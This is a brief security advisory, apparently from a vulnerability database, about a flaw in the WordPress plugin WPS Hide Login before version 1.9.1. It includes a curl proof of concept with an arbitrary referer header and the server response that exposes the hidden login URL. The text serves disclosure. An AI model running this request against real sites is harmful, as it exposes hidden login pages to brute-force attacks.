The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.
curl --referer “something” -sIXGET https://example.com/wp-admin/options.php HTTP/2 302 … location: https://example.com/secret-login/?redirect_to=%2Fwp-admin%2Fsomething&reauth;=1
CPE | Name | Operator | Version |
---|---|---|---|
wps-hide-login | lt | 1.9.1 |